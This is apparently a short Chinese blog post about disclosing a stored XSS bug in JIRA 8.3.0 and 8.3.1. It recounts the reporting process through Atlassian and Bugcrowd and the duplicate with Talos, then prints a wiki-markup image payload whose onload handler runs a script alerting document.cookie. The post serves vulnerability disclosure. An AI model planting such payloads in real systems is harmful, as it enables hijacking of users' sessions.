前言
在JIRA v8.3.1还是最新版本的时候,通过Atlassian的邮件提交了该漏洞 然后等待了几天,Atlassian发布了v8.3.2 并告知我通过邮件自动在Service desk创建的issue已经不再使用,要去Bugcrowed提交 于是跑去Bugcrowed提交,又过了一个星期,对方表示非最新版本的漏洞不接受…. 最后发现和 talos 撞洞了,一波三折,有些无语 =.=
Payload
影响 JIRA v8.3.1 & 8.3.0, 对 v8.3.2 不起作用
!invalid_picture.jpg|width=405,height=304" onload="javascript:alert(document.cookie)!
Result
